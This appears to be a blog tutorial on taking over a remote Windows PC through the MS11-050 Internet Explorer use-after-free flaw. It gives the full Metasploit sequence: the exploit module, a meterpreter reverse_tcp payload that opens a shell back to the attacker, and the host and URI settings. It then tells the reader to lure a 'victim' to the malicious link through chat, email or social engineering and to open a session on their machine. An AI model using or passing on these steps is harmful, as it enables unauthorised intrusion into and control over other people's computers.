How to Hack Remote Windows 7 PC

MS11-050 IE mshtml!CObjectElement Use After Free

This module exploits a use-after-free vulnerability in Internet Explorer. The vulnerability occurs when an invalid <object> tag exists and other elements overlap/cover where the object tag should be when rendered (due to their styles/positioning). The mshtml! CObject Element is then freed from memory because it is invalid. However, the mshtml! CDisplay object for the page continues to keep a reference to the freed <object> and attempts to call a function on it, leading to the use-after-free. Please note that for IE 8 targets, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention).

Exploit Targets

Internet Explorer 7 on XP SP3

Internet Explorer 7 on Windows Vista

Internet Explorer 8 on XP SP3

 Internet Explorer 8 on Windows 7


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/ms11_050_mshtml_cobjectelement

Msf exploit (ms11_050_mshtml_cobjectelement)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms11_050_mshtml_cobjectelement)>set lhost (IP of Local Host)

Msf exploit (ms11_050_mshtml_cobjectelement)>set srvhost (This must be an address on the local machine)

Msf exploit (ms11_050_mshtml_cobjectelement) set uripath win7tricks (The Url to use for this exploit)

Msf exploit (ms11_050_mshtml_cobjectelement)>exploit

Now an URL you should give to your victim //

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Leave a Reply

Your email address will not be published. Required fields are marked *